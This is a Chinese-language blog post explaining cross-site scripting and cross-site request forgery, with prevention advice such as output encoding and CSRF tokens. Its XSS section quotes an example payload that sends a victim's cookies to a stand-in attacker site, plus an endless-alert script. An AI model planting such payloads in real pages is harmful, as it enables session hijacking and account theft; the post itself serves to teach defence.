XSS和CSRF的简述与预防

偏执的太偏执、 2022-02-20 08:21 213阅读 0赞

### 文章目录 ###

*  XSS
 *   *  预防
     *   *  输入过滤
         *  输出编码
         *  Cookie防盗
 *  CSRF
 *   *  例子
     *  预防
 *  区别

# XSS #

**跨站脚本XSS**，全称为(Cross-site scripting)，因为可能会与层叠样式表(Casading style sheet)英文简称相同而产生歧义，因此将“C”改为“X”。

攻击者在网页中嵌入JavaScript脚本，当用户在该网页上浏览时，脚本便会运行从而达到攻击者的目的。

例如一个评论区，我写了这样一条评论

<script>
    while(true){
         
        alert('You are fooled');
    }
    </script>

如果网页对输入跟输出都没有做任何的限制而是直接将这样的内容显示出来，**结果就是浏览器将这条评论认为是页面的一部分从而执行`script`标签中的代码。** 结果就会是不断的弹出窗口。

这样算是好的，仅仅是个恶作剧，而一旦代码是来获取用户的`Cookie`。那这样后果更加严重，相当于被攻击者的身份认证被窃取了。

<script>location.replace("http://www.foo.com/record.asp?secret="+document.cookie)</script>

如上，浏览器执行到这段代码后，就会自动访问攻击者建立的网站`www.foo.com`，打开其中的`recourd.asp`，将受害者浏览器的`Cookie`信息给记录下来。

## 预防 ##

### 输入过滤 ###

既然是因为浏览器会直接将用户输入的内容识别成html代码，那么通过过滤掉’<’、’>’、‘script’等关键字就可以了。或者是将’<‘替换成’<’

### 输出编码 ###

如果是输入之后不进行过滤，也可以在输出到页面之前对这些内容进行编码，例如`HtmlEncoder`等工具。这样即便是用户输入的是一些`html`代码也只会被当做文本看待。

### Cookie防盗 ###

如果说前两者都没有做，还有一件事可以做。那就是`Cookie`的防盗，因为XSS对用户伤害最大的还是窃取用户的`Cookie`，那么通过对`Cookie`的加密可以尽量的减少风险。**为了防止重放攻击，也可以将`Cookie`与IP地址进行绑定。**

# CSRF #

跨站请求伪造(Cross-site request forgery)。是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。

## 例子 ##

网站A ：为恶意网站。

网站B ：用户已登录的网站。

当用户访问A站时，A站私自访问B站的操作链接，模拟用户操作。

假设B站有一个删除评论的链接：`http://b.com/comment/?type=delete&id=81723`

A站直接访问该链接，就能删除用户在B站的评论。

## 预防 ##

CSRF能攻击成功，根本原因是：**操作所带的参数均被攻击者猜测到**。既然知道根本原因，我们就可以对症下药。

1.  验证码
2.  Token，也叫令牌。当向服务器传参数时，带上Token。这个Token是一个随机值，并且由服务器和用户同时持有。当用户提交表单时带上Token值，服务器就能验证表单和session中的Token是否一致。

# 区别 #

1.  XSS的主语是**脚本**，而CSRF的主语是**请求**。
2.  CSRF可以由XSS实现（由XSS实现的CSRF也称XSRF）。
3.  XSS更偏向于方法论，CSRF更偏向于一种形式，**只要是伪造用户发起的请求**，都可成为CSRF攻击。

发表评论取消回复

表情：

评论列表（有 0 条评论，213人围观）

还没有评论，来说两句吧...

相关阅读

相关 CSRF的简述

先从一个故事说起（故事纯属虚构，恶意模仿后果自负）：小谷最近遭遇电信诈骗被骗的倾家荡产，于是他想到了报复社会。在知乎上狂点800个没有帮助1000个举报后，他决定做点正事干

Myth丶恋晨/ 2022年11月09日 12:53/ 0 赞/ 144 阅读

相关 CSRF与XSS攻击的原理与防范

CSRF 1、概念与原理 CSRF，跨站请求伪造，攻击方伪装用户身份发送请求从而窃取信息或者破坏系统。例如：用户访问A网站登陆并生成了cookie，再访问B网站

Bertha 。/ 2022年10月02日 15:52/ 0 赞/ 239 阅读

相关 XSS与CSRF攻击防御概念

先看这两篇文章：[XSS攻击原理及防御措施][XSS] [CSRF攻击介绍及防御][CSRF] 攻击概念 CSRF跨站请求伪造（Cross-site request

傷城~/ 2022年07月16日 17:48/ 0 赞/ 254 阅读

相关 CSRF和XSS攻击

本文转载至 http://www.2cto.com/ 本文说一下SpringMVC如何防御CSRF(Cross-site request forgery跨站请求伪造)和XS

柔情只为你懂/ 2022年07月11日 06:54/ 0 赞/ 297 阅读

相关 Web安全之CSRF和XSS

一、CSRF 实验原理： CSRF（Cross-Site Request Forgery，跨站点伪造请求）是一种网络攻击方式，该攻击可以在受害者毫不知情的情况下以受害者名

系统管理员/ 2022年05月15日 10:34/ 0 赞/ 268 阅读

相关 CSRF攻击简述

一.CSRF是什么？　　CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session

﹏ヽ暗。殇╰゛Y/ 2022年03月01日 07:58/ 0 赞/ 299 阅读

相关 XSS和CSRF的简述与预防

文章目录 XSS 预防输入过滤输出编码 Cookie防盗 CSRF

偏执的太偏执、/ 2022年02月20日 08:21/ 0 赞/ 214 阅读

相关 xss和csrf攻击的那些事儿

xss xss 的全称是`Cross Site Script`，缩写为了避免和样式css冲突，于是缩写为xss 中文意思是跨站脚本攻击。 xss攻击一般是指用恶意的脚

谁践踏了优雅/ 2022年01月12日 05:33/ 0 赞/ 272 阅读

相关 PHP 预防CSRF、XSS、SQL注入攻击(综合版)

【简约版】主要通过校验用户输入信息，过滤用户输入信息，以及关闭错误信息显示等方法。一、SQL注入:将恶意的SQL命令通过表单提交等方式注入到后台数据库引擎进行执行，

我就是我/ 2022年01月09日 17:27/ 0 赞/ 354 阅读

相关前端安全：XSS和CSRF

1.概念 XSS：Cross Site Script，中译是跨站脚本攻击 CSRF：Cross-site request forgery，中文为跨站请求伪造 XSS 攻击

- 日理万妓/ 2021年12月11日 10:43/ 0 赞/ 263 阅读